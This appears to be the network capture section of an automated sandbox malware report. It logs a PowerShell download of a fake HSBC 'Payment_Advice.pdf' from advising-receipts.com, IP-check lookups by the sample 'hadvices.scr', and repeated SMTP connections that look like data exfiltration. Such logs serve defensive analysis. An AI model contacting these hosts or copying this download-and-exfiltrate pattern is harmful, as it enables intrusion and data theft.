                                                    May 1, 2024 15:18:50.283668041 CEST58749750108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:50.785491943 CEST49750587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:50.971277952 CEST58749750108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:50.973021030 CEST49751587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:51.158214092 CEST58749751108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:51.660538912 CEST49751587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:51.845679998 CEST58749751108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:52.348021984 CEST49751587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:52.532847881 CEST58749751108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:53.035506964 CEST49751587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:53.221565962 CEST58749751108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:53.738610983 CEST49751587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:53.923520088 CEST58749751108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:54.143819094 CEST49752587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:54.328566074 CEST58749752108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:54.832338095 CEST49752587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:55.017455101 CEST58749752108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:55.519849062 CEST49752587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:55.705322981 CEST58749752108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:56.207547903 CEST49752587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:56.393023968 CEST58749752108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:56.898338079 CEST49752587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:57.084678888 CEST58749752108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:58.957066059 CEST49753587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:59.142776012 CEST58749753108.167.142.65192.168.2.7
                                                    May 1, 2024 15:18:59.644862890 CEST49753587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:18:59.830840111 CEST58749753108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:00.332386971 CEST49753587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:00.518038988 CEST58749753108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:01.019961119 CEST49753587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:01.207639933 CEST58749753108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:01.707415104 CEST49753587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:01.893611908 CEST58749753108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:02.814527035 CEST49754587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:02.999007940 CEST58749754108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:03.504266977 CEST49754587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:03.688738108 CEST58749754108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:04.191757917 CEST49754587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:04.376245975 CEST58749754108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:04.879268885 CEST49754587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:05.064759970 CEST58749754108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:05.582421064 CEST49754587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:05.767082930 CEST58749754108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:07.677334070 CEST49755587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:07.863184929 CEST58749755108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:08.363670111 CEST49755587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:08.549455881 CEST58749755108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:09.051177979 CEST49755587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:09.237016916 CEST58749755108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:09.738689899 CEST49755587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:09.924498081 CEST58749755108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:10.426155090 CEST49755587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:10.613389969 CEST58749755108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:11.763715029 CEST49756587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:11.949039936 CEST58749756108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:12.457515001 CEST49756587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:12.642808914 CEST58749756108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:13.144898891 CEST49756587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:13.333462954 CEST58749756108.167.142.65192.168.2.7
                                                    May 1, 2024 15:19:13.848119020 CEST49756587192.168.2.7108.167.142.65
                                                    May 1, 2024 15:19:14.033320904 CEST58749756108.167.142.65192.168.2.7

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 1, 2024 15:17:06.882311106 CEST6311353192.168.2.71.1.1.1
                                                    May 1, 2024 15:17:06.986912012 CEST53631131.1.1.1192.168.2.7
                                                    May 1, 2024 15:17:26.341912985 CEST5917553192.168.2.71.1.1.1
                                                    May 1, 2024 15:17:26.437238932 CEST53591751.1.1.1192.168.2.7
                                                    May 1, 2024 15:17:26.810415983 CEST5425353192.168.2.71.1.1.1
                                                    May 1, 2024 15:17:26.909460068 CEST53542531.1.1.1192.168.2.7
                                                    May 1, 2024 15:17:35.597450018 CEST6180953192.168.2.71.1.1.1
                                                    May 1, 2024 15:17:35.949825048 CEST53618091.1.1.1192.168.2.7
                                                    May 1, 2024 15:17:58.973305941 CEST6175753192.168.2.71.1.1.1
                                                    May 1, 2024 15:17:59.334547043 CEST53617571.1.1.1192.168.2.7
                                                    May 1, 2024 15:18:21.492137909 CEST6494253192.168.2.71.1.1.1
                                                    May 1, 2024 15:18:21.734651089 CEST53649421.1.1.1192.168.2.7
                                                    May 1, 2024 15:18:36.661045074 CEST4996853192.168.2.71.1.1.1
                                                    May 1, 2024 15:18:36.901560068 CEST53499681.1.1.1192.168.2.7
                                                    May 1, 2024 15:19:00.724261045 CEST5017753192.168.2.71.1.1.1
                                                    May 1, 2024 15:19:00.966758966 CEST53501771.1.1.1192.168.2.7

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    May 1, 2024 15:17:06.882311106 CEST192.168.2.71.1.1.10xc48bStandard query (0)advising-receipts.comA (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.341912985 CEST192.168.2.71.1.1.10x2e6Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.810415983 CEST192.168.2.71.1.1.10xc5ddStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:35.597450018 CEST192.168.2.71.1.1.10x8a23Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:58.973305941 CEST192.168.2.71.1.1.10xbebcStandard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                    May 1, 2024 15:18:21.492137909 CEST192.168.2.71.1.1.10x3837Standard query (0)mail.qoldenfrontier.comA (IP address)IN (0x0001)false
                                                    May 1, 2024 15:18:36.661045074 CEST192.168.2.71.1.1.10x5783Standard query (0)mail.qoldenfrontier.comA (IP address)IN (0x0001)false
                                                    May 1, 2024 15:19:00.724261045 CEST192.168.2.71.1.1.10xe3c4Standard query (0)mail.qoldenfrontier.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    May 1, 2024 15:17:06.986912012 CEST1.1.1.1192.168.2.70xc48bNo error (0)advising-receipts.com172.67.141.195A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:06.986912012 CEST1.1.1.1192.168.2.70xc48bNo error (0)advising-receipts.com104.21.27.63A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.437238932 CEST1.1.1.1192.168.2.70x2e6No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                    May 1, 2024 15:17:26.437238932 CEST1.1.1.1192.168.2.70x2e6No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.437238932 CEST1.1.1.1192.168.2.70x2e6No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.437238932 CEST1.1.1.1192.168.2.70x2e6No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.437238932 CEST1.1.1.1192.168.2.70x2e6No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.437238932 CEST1.1.1.1192.168.2.70x2e6No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.909460068 CEST1.1.1.1192.168.2.70xc5ddNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:26.909460068 CEST1.1.1.1192.168.2.70xc5ddNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:35.949825048 CEST1.1.1.1192.168.2.70x8a23No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:35.949825048 CEST1.1.1.1192.168.2.70x8a23No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:59.334547043 CEST1.1.1.1192.168.2.70xbebcNo error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:17:59.334547043 CEST1.1.1.1192.168.2.70xbebcNo error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:18:21.734651089 CEST1.1.1.1192.168.2.70x3837No error (0)mail.qoldenfrontier.com108.167.142.65A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:18:36.901560068 CEST1.1.1.1192.168.2.70x5783No error (0)mail.qoldenfrontier.com108.167.142.65A (IP address)IN (0x0001)false
                                                    May 1, 2024 15:19:00.966758966 CEST1.1.1.1192.168.2.70xe3c4No error (0)mail.qoldenfrontier.com108.167.142.65A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • advising-receipts.com
                                                    • armmf.adobe.com
                                                    • reallyfreegeoip.org
                                                    • scratchdreams.tk
                                                    • checkip.dyndns.org

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.749720193.122.130.0808336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    May 1, 2024 15:17:26.568280935 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    May 1, 2024 15:17:26.663008928 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>
                                                    May 1, 2024 15:17:26.675785065 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    May 1, 2024 15:17:26.773938894 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>
                                                    May 1, 2024 15:17:27.758217096 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    May 1, 2024 15:17:27.865155935 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:27 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.749728193.122.130.0808336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    May 1, 2024 15:17:29.975919008 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    May 1, 2024 15:17:30.071109056 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.749730193.122.130.0808336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    May 1, 2024 15:17:30.957253933 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    May 1, 2024 15:17:31.052700996 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:31 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.749732193.122.130.0808336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    May 1, 2024 15:17:31.603873968 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    May 1, 2024 15:17:31.698998928 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:31 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.749734193.122.130.0808336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    May 1, 2024 15:17:32.253535032 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    May 1, 2024 15:17:32.348392963 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.749736193.122.130.0808336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    May 1, 2024 15:17:34.000605106 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    May 1, 2024 15:17:34.095657110 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:34 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.749738193.122.130.0808336C:\Windows\Temp\hadvices.scr
                                                    TimestampBytes transferredDirectionData
                                                    May 1, 2024 15:17:34.662223101 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    May 1, 2024 15:17:34.757692099 CEST273INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:34 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 104
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.749704172.67.141.1954434912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-01 13:17:07 UTC189OUTGET /hsbc/Payment_Advice.pdf HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                    Host: advising-receipts.com
                                                    Connection: Keep-Alive
                                                    2024-05-01 13:17:07 UTC644INHTTP/1.1 200 OK
                                                    Date: Wed, 01 May 2024 13:17:07 GMT
                                                    Content-Type: application/pdf
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=14400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Wed, 01 May 2024 13:17:07 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ca1UGuXJQAmIqtePQ2kepeZdgB9%2BwbNXgBYjjrDKHT7eann3djqqpViz4La8iWAFsWp2AFmxH3tA3hjWi5HG3jRjCZWdjmlG%2FiP59ZxxxFYjcdfoy6CXVnRFVoTEtWIjERJUDukyrQA%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 87d00cc939a65a27-IAD
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-05-01 13:17:07 UTC725INData Raw: 33 38 66 66 0d 0a 25 50 44 46 2d 31 2e 34 0d 0a 25 e2 e3 cf d3 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 0d 0a 2f 54 79 70 65 20 2f 50 61 67 65 0d 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 35 20 38 34 32 20 5d 0d 0a 2f 52 65 73 6f 75 72 63 65 73 20 3c 3c 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 58 30 20 33 20 30 20 52 20 3e 3e 20 3e 3e 0d 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 0d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0d 0a 2f 52 6f 74 61 74 65 20 33 36 30 0d 0a 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 0d 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0d 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0d 0a 2f 57 69 64 74 68 20 32 34 38 30 0d 0a 2f 48 65 69 67 68 74 20 33 35 30 39 0d 0a 2f 42 69 74 73 50
                                                    Data Ascii: 38ff%PDF-1.4%1 0 obj<</Type /Page/MediaBox [ 0 0 595 842 ]/Resources << /XObject << /X0 3 0 R >> >>/Contents 4 0 R/Parent 2 0 R/Rotate 360>>endobj3 0 obj<</Type /XObject/Subtype /Image/Width 2480/Height 3509/BitsP
                                                    2024-05-01 13:17:07 UTC1369INData Raw: 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fd fc a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28
                                                    Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?((((((((
                                                    2024-05-01 13:17:07 UTC1369INData Raw: 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00
                                                    Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
